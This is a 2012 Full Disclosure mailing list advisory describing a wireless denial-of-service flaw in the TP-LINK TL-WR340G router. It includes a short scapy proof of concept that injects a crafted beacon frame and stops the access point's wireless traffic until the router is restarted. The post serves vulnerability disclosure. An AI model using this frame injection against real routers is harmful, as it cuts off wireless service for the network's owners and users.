Full Disclosure mailing list archives
TP-LINK TL-WR340G Wireless Denial of Service
From: "Adam P." <ziherung.pl () gmail com>
Date: Tue, 04 Sep 2012 20:14:24 +0200
=== intro === TP-LINK TL-WR340G is a SOHO router with integrated IEEE 802.11b/g AP. Now it's marked End-of-Life. Transmitting crafted frames in proximity of working router cause device to malfunction. Wireless communication stops, existing clients don't receive frames from AP ( except beacons ), new clients can't connect. === details === Affected product: TL-WR340G Wireless router Firm Version: 4.7.11 Build 101102 Rel.60376n Hardware Version: WR340G v3 Local/remote: Local ( wirelessly ) Vulnerability can be spotted by crafting and transmitting frame with scapy:
fr = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2="<AP
MAC>",addr3="<AP MAC>")/Dot11Beacon()/Dot11Elt()
sendp(fr,iface="injection capable wireless interface",count=5)
Attacker could cease wireless traffic. To resume AP functionality user must restart wireless interface in WebGUI or restart device. === time-line === 2.08.2012 - vendor notified 4.09.2012 - no response from vendor, published _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- TP-LINK TL-WR340G Wireless Denial of Service Adam P. (Sep 06)